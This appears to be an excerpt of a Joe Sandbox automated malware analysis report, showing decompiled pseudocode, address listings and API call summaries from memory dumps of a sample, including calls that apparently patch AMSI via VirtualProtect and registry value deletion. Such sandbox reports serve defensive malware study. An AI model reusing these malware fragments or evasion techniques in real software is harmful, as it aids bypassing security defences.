                                                                                                                                                                                                                                                                                          					if(_t18 != 0x27) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_t38 =  *_t63;
                                                                                                                                                                                                                                                                                          							_t20 =  *_t38 + 0xfffffff7;
                                                                                                                                                                                                                                                                                          							if(_t20 > 0x17) {
                                                                                                                                                                                                                                                                                          								L22:
                                                                                                                                                                                                                                                                                          								_t21 = CharNextA(_t38);
                                                                                                                                                                                                                                                                                          								 *_t63 = _t21;
                                                                                                                                                                                                                                                                                          								_t22 = _t21 - _t38;
                                                                                                                                                                                                                                                                                          								_t14 = _t65 + 1; // 0x1
                                                                                                                                                                                                                                                                                          								if(_t22 + _t14 >= _v8 + 0x1000) {
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(_t22 > 0) {
                                                                                                                                                                                                                                                                                          										_t41 = _t38 - _t65;
                                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                                          											 *_t65 =  *((intOrPtr*)(_t41 + _t65));
                                                                                                                                                                                                                                                                                          											_t65 = _t65 + 1;
                                                                                                                                                                                                                                                                                          											_t22 = _t22 - 1;
                                                                                                                                                                                                                                                                                          										} while (_t22 != 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								switch( *((intOrPtr*)(( *(_t20 + 0xf2d40) & 0x000000ff) * 4 +  &M000F2D38))) {
                                                                                                                                                                                                                                                                                          									case 0:
                                                                                                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                                                                                                          									case 1:
                                                                                                                                                                                                                                                                                          										goto L22;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                                                                                                          						} while ( *( *_t63) != 0);
                                                                                                                                                                                                                                                                                          						L27:
                                                                                                                                                                                                                                                                                          						 *_t65 = 0;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t26 = CharNextA(_t50);
                                                                                                                                                                                                                                                                                          						 *_t63 = _t26;
                                                                                                                                                                                                                                                                                          						while( *_t26 != 0) {
                                                                                                                                                                                                                                                                                          							_t29 =  *_t63;
                                                                                                                                                                                                                                                                                          							if( *_t29 != 0x27 ||  *(CharNextA(_t29)) == 0x27) {
                                                                                                                                                                                                                                                                                          								_t30 =  *_t63;
                                                                                                                                                                                                                                                                                          								if( *_t30 == 0x27) {
                                                                                                                                                                                                                                                                                          									 *_t63 = CharNextA(_t30);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t44 =  *_t63;
                                                                                                                                                                                                                                                                                          								_t31 = CharNextA(_t44);
                                                                                                                                                                                                                                                                                          								 *_t63 = _t31;
                                                                                                                                                                                                                                                                                          								_t32 = _t31 - _t44;
                                                                                                                                                                                                                                                                                          								_t7 = _t65 + 1; // 0x1
                                                                                                                                                                                                                                                                                          								if(_t32 + _t7 >= _v8 + 0x1000) {
                                                                                                                                                                                                                                                                                          									L28:
                                                                                                                                                                                                                                                                                          									return 0x80020009;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(_t32 > 0) {
                                                                                                                                                                                                                                                                                          										_t46 = _t44 - _t65;
                                                                                                                                                                                                                                                                                          										do {
                                                                                                                                                                                                                                                                                          											 *_t65 =  *((intOrPtr*)(_t46 + _t65));
                                                                                                                                                                                                                                                                                          											_t65 = _t65 + 1;
                                                                                                                                                                                                                                                                                          											_t32 = _t32 - 1;
                                                                                                                                                                                                                                                                                          										} while (_t32 != 0);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t26 =  *_t63;
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if( *( *_t63) == 0) {
                                                                                                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t65 = 0;
                                                                                                                                                                                                                                                                                          							 *_t63 = CharNextA( *_t63);
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0x80020009;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L29:
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x000f2be0
                                                                                                                                                                                                                                                                                          0x000f2be5
                                                                                                                                                                                                                                                                                          0x000f2be7
                                                                                                                                                                                                                                                                                          0x000f2be7
                                                                                                                                                                                                                                                                                          0x000f2bec
                                                                                                                                                                                                                                                                                          0x000f2bf2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2bfb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2bfb
                                                                                                                                                                                                                                                                                          0x000f2c0d
                                                                                                                                                                                                                                                                                          0x000f2c0d
                                                                                                                                                                                                                                                                                          0x000f2c0f
                                                                                                                                                                                                                                                                                          0x000f2c13
                                                                                                                                                                                                                                                                                          0x000f2c20
                                                                                                                                                                                                                                                                                          0x000f2c25
                                                                                                                                                                                                                                                                                          0x000f2cb0
                                                                                                                                                                                                                                                                                          0x000f2cb0
                                                                                                                                                                                                                                                                                          0x000f2cb5
                                                                                                                                                                                                                                                                                          0x000f2cbb
                                                                                                                                                                                                                                                                                          0x000f2ccb
                                                                                                                                                                                                                                                                                          0x000f2ccc
                                                                                                                                                                                                                                                                                          0x000f2cd5
                                                                                                                                                                                                                                                                                          0x000f2cd7
                                                                                                                                                                                                                                                                                          0x000f2cd9
                                                                                                                                                                                                                                                                                          0x000f2ce5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2ce7
                                                                                                                                                                                                                                                                                          0x000f2ce9
                                                                                                                                                                                                                                                                                          0x000f2ceb
                                                                                                                                                                                                                                                                                          0x000f2cf0
                                                                                                                                                                                                                                                                                          0x000f2cf3
                                                                                                                                                                                                                                                                                          0x000f2cf5
                                                                                                                                                                                                                                                                                          0x000f2cf6
                                                                                                                                                                                                                                                                                          0x000f2cf6
                                                                                                                                                                                                                                                                                          0x000f2cf0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2ce9
                                                                                                                                                                                                                                                                                          0x000f2cbd
                                                                                                                                                                                                                                                                                          0x000f2cc4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2cc4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2cf9
                                                                                                                                                                                                                                                                                          0x000f2cfb
                                                                                                                                                                                                                                                                                          0x000f2d00
                                                                                                                                                                                                                                                                                          0x000f2d01
                                                                                                                                                                                                                                                                                          0x000f2d0a
                                                                                                                                                                                                                                                                                          0x000f2c2b
                                                                                                                                                                                                                                                                                          0x000f2c32
                                                                                                                                                                                                                                                                                          0x000f2c34
                                                                                                                                                                                                                                                                                          0x000f2c36
                                                                                                                                                                                                                                                                                          0x000f2c3b
                                                                                                                                                                                                                                                                                          0x000f2c40
                                                                                                                                                                                                                                                                                          0x000f2c4a
                                                                                                                                                                                                                                                                                          0x000f2c4f
                                                                                                                                                                                                                                                                                          0x000f2c54
                                                                                                                                                                                                                                                                                          0x000f2c54
                                                                                                                                                                                                                                                                                          0x000f2c56
                                                                                                                                                                                                                                                                                          0x000f2c59
                                                                                                                                                                                                                                                                                          0x000f2c62
                                                                                                                                                                                                                                                                                          0x000f2c64
                                                                                                                                                                                                                                                                                          0x000f2c66
                                                                                                                                                                                                                                                                                          0x000f2c72
                                                                                                                                                                                                                                                                                          0x000f2d0b
                                                                                                                                                                                                                                                                                          0x000f2d15
                                                                                                                                                                                                                                                                                          0x000f2c78
                                                                                                                                                                                                                                                                                          0x000f2c7a
                                                                                                                                                                                                                                                                                          0x000f2c7c
                                                                                                                                                                                                                                                                                          0x000f2c80
                                                                                                                                                                                                                                                                                          0x000f2c83
                                                                                                                                                                                                                                                                                          0x000f2c85
                                                                                                                                                                                                                                                                                          0x000f2c86
                                                                                                                                                                                                                                                                                          0x000f2c86
                                                                                                                                                                                                                                                                                          0x000f2c80
                                                                                                                                                                                                                                                                                          0x000f2c89
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2c8b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2c40
                                                                                                                                                                                                                                                                                          0x000f2c98
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2c9a
                                                                                                                                                                                                                                                                                          0x000f2c9a
                                                                                                                                                                                                                                                                                          0x000f2ca3
                                                                                                                                                                                                                                                                                          0x000f2cab
                                                                                                                                                                                                                                                                                          0x000f2cab
                                                                                                                                                                                                                                                                                          0x000f2c98
                                                                                                                                                                                                                                                                                          0x000f2c15
                                                                                                                                                                                                                                                                                          0x000f2c1e
                                                                                                                                                                                                                                                                                          0x000f2c1e
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2C03
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,00000000,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2C32
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2C43
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2C52
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(74918CE0,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2C59
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,?,000F31CB,?,?,00000000,00000003,?,?), ref: 000F2CA0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f48ea53ed70d3daa49ece1d7c1cad6a15ee04e3deedac155c8c24715e5fb3ac2
                                                                                                                                                                                                                                                                                          • Instruction ID: af426ba1f0b1c1a3a82d40f10551acd4cba9ab55e19d33fb5342f6c28091debf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f48ea53ed70d3daa49ece1d7c1cad6a15ee04e3deedac155c8c24715e5fb3ac2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9441267050828A8FE722CF78D890778BBE5AF1E301F244599D98AC7B52D7718C90EBD0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02527346
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02527353
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 0252737D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 025273BD
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 025273F1
                                                                                                                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000000,00000000,-00000001), ref: 02527420
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 02527465
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0a6d6672c4df7ab45906cf38d038e4ad6876dbdeef4d54c84a3af67eb9c324d5
                                                                                                                                                                                                                                                                                          • Instruction ID: 6756e614fa7aa3449e8be02019cd976dc32cc71417d9a41b6f8d7773225b6fee
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a6d6672c4df7ab45906cf38d038e4ad6876dbdeef4d54c84a3af67eb9c324d5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9151D771D00219EFDB08CF98C994BEEBBB5FF49309F148559E905A7280D374AA84CFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                          			E000F6860(intOrPtr* __ecx, intOrPtr* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagENHMETAHEADER _v164;
                                                                                                                                                                                                                                                                                          				intOrPtr _v168;
                                                                                                                                                                                                                                                                                          				intOrPtr _v172;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _v176;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v180;
                                                                                                                                                                                                                                                                                          				int _v184;
                                                                                                                                                                                                                                                                                          				int _v188;
                                                                                                                                                                                                                                                                                          				int _v192;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                                                                                          				int _t68;
                                                                                                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                          				int _t83;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				int _t88;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t89;
                                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t89 = __esi;
                                                                                                                                                                                                                                                                                          				_t40 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t40 ^ _t90;
                                                                                                                                                                                                                                                                                          				_t42 = _a4;
                                                                                                                                                                                                                                                                                          				_t68 =  *((intOrPtr*)(__esi + 0xc)) -  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          				_t88 =  *((intOrPtr*)(__esi + 8)) -  *__esi;
                                                                                                                                                                                                                                                                                          				_v180 = __ecx;
                                                                                                                                                                                                                                                                                          				if(_t88 >= 0 && _t68 >= 0) {
                                                                                                                                                                                                                                                                                          					_v176 =  *((intOrPtr*)(_t42 + 8));
                                                                                                                                                                                                                                                                                          					_v172 = 0;
                                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                                          					E00106820( &_v164, 0, 0x6c);
                                                                                                                                                                                                                                                                                          					_v164.iType = 1;
                                                                                                                                                                                                                                                                                          					_v164.nSize = 0x6c;
                                                                                                                                                                                                                                                                                          					_t46 = GetEnhMetaFileHeader(_v176, 0x6c,  &_v164);
                                                                                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          					_t48 =  ~_t46 &  &_v164;
                                                                                                                                                                                                                                                                                          					_t75 =  *(_t48 + 0x48);
                                                                                                                                                                                                                                                                                          					_t49 =  *(_t48 + 0x4c);
                                                                                                                                                                                                                                                                                          					_v184 = _t75;
                                                                                                                                                                                                                                                                                          					_v192 = _t49;
                                                                                                                                                                                                                                                                                          					_t50 = MulDiv(_t88, _t49, _t75);
                                                                                                                                                                                                                                                                                          					_t83 = _v192;
                                                                                                                                                                                                                                                                                          					_v188 = _t50;
                                                                                                                                                                                                                                                                                          					_t76 = MulDiv(_t68, _v184, _t83);
                                                                                                                                                                                                                                                                                          					if(_t76 > _t88) {
                                                                                                                                                                                                                                                                                          						_t77 = _v180;
                                                                                                                                                                                                                                                                                          						_t88 = _v188;
                                                                                                                                                                                                                                                                                          						 *_t77 =  *__esi;
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(__esi + 8));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 8)) = _t80;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t58 = (_t68 - _t88 - _t80 >> 1) +  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 4)) = _t58;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 0xc)) = _t58 + _t88;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t85 =  *__esi + (_t88 - _t76 - _t83 >> 1);
                                                                                                                                                                                                                                                                                          						_t66 = _v180;
                                                                                                                                                                                                                                                                                          						 *_t66 = _t85;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 8)) = _t85 + _t76;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(__esi + 0xc));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 0xc)) =  *((intOrPtr*)(__esi + 0xc));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_push(_v172);
                                                                                                                                                                                                                                                                                          					E001062C2();
                                                                                                                                                                                                                                                                                          					_push(_v168);
                                                                                                                                                                                                                                                                                          					_t42 = E001062C2();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(_t42, _t68, _v12 ^ _t90, _t80, _t88, _t89);
                                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                                          0x000f6860
                                                                                                                                                                                                                                                                                          0x000f6869
                                                                                                                                                                                                                                                                                          0x000f6870
                                                                                                                                                                                                                                                                                          0x000f6873
                                                                                                                                                                                                                                                                                          0x000f687a
                                                                                                                                                                                                                                                                                          0x000f6881
                                                                                                                                                                                                                                                                                          0x000f6883
                                                                                                                                                                                                                                                                                          0x000f688d
                                                                                                                                                                                                                                                                                          0x000f68a8
                                                                                                                                                                                                                                                                                          0x000f68ae
                                                                                                                                                                                                                                                                                          0x000f68b4
                                                                                                                                                                                                                                                                                          0x000f68ba
                                                                                                                                                                                                                                                                                          0x000f68d2
                                                                                                                                                                                                                                                                                          0x000f68dc
                                                                                                                                                                                                                                                                                          0x000f68e6
                                                                                                                                                                                                                                                                                          0x000f68ee
                                                                                                                                                                                                                                                                                          0x000f68f6
                                                                                                                                                                                                                                                                                          0x000f68f8
                                                                                                                                                                                                                                                                                          0x000f68fb
                                                                                                                                                                                                                                                                                          0x000f6901
                                                                                                                                                                                                                                                                                          0x000f6907
                                                                                                                                                                                                                                                                                          0x000f690d
                                                                                                                                                                                                                                                                                          0x000f6913
                                                                                                                                                                                                                                                                                          0x000f6919
                                                                                                                                                                                                                                                                                          0x000f692e
                                                                                                                                                                                                                                                                                          0x000f6932
                                                                                                                                                                                                                                                                                          0x000f695e
                                                                                                                                                                                                                                                                                          0x000f6964
                                                                                                                                                                                                                                                                                          0x000f696a
                                                                                                                                                                                                                                                                                          0x000f696c
                                                                                                                                                                                                                                                                                          0x000f6973
                                                                                                                                                                                                                                                                                          0x000f6976
                                                                                                                                                                                                                                                                                          0x000f697b
                                                                                                                                                                                                                                                                                          0x000f697e
                                                                                                                                                                                                                                                                                          0x000f6983
                                                                                                                                                                                                                                                                                          0x000f6934
                                                                                                                                                                                                                                                                                          0x000f6938
                                                                                                                                                                                                                                                                                          0x000f693f
                                                                                                                                                                                                                                                                                          0x000f6941
                                                                                                                                                                                                                                                                                          0x000f6947
                                                                                                                                                                                                                                                                                          0x000f694b
                                                                                                                                                                                                                                                                                          0x000f6951
                                                                                                                                                                                                                                                                                          0x000f6954
                                                                                                                                                                                                                                                                                          0x000f6957
                                                                                                                                                                                                                                                                                          0x000f6957
                                                                                                                                                                                                                                                                                          0x000f698c
                                                                                                                                                                                                                                                                                          0x000f698d
                                                                                                                                                                                                                                                                                          0x000f6998
                                                                                                                                                                                                                                                                                          0x000f6999
                                                                                                                                                                                                                                                                                          0x000f699e
                                                                                                                                                                                                                                                                                          0x000f69b0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileHeaderMeta_memset
                                                                                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                                                                                          • API String ID: 711141002-2517025534
                                                                                                                                                                                                                                                                                          • Opcode ID: 7ee95aecd266a91dc613eed401d1fd4ffcb225844a2530a97ad99cb84cdbba2e
                                                                                                                                                                                                                                                                                          • Instruction ID: 70c53706e4dd327b7bc33c7ef982b547b64837cb893c8a824141d4dab807e590
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee95aecd266a91dc613eed401d1fd4ffcb225844a2530a97ad99cb84cdbba2e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA411875A003189FCB24CF68CC85B9ABBFAAF88310F1485ADA58DD7351DB71A984CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(02554070,00000000,00000800), ref: 02552509
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,02554078), ref: 02552525
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 02552560
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 02552581
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                          • String ID: AMSI
                                                                                                                                                                                                                                                                                          • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                                          • Opcode ID: b87683f423567bcf5d9df14fa585695669d9abcdf0a5cff263d60f442295d334
                                                                                                                                                                                                                                                                                          • Instruction ID: c087c404f03209687bc25efbc1d5804fd47033238017953ee7be9414bda767f9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b87683f423567bcf5d9df14fa585695669d9abcdf0a5cff263d60f442295d334
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D311C9B5E40319EFDB04CF94C869BAEBBB4BF48300F104599EA06AB250D7706A54DF59
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,040118A0,00000000,000F003F,00000000), ref: 025284F7
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,04011890,00000000,00000003,?,00000020), ref: 02528528
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04011890), ref: 02528545
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0252854F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                                          • Instruction ID: e8bfdc46303c263eddcf9773e9c68300f2ee73eddae0b1cfdff711ea919872f1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
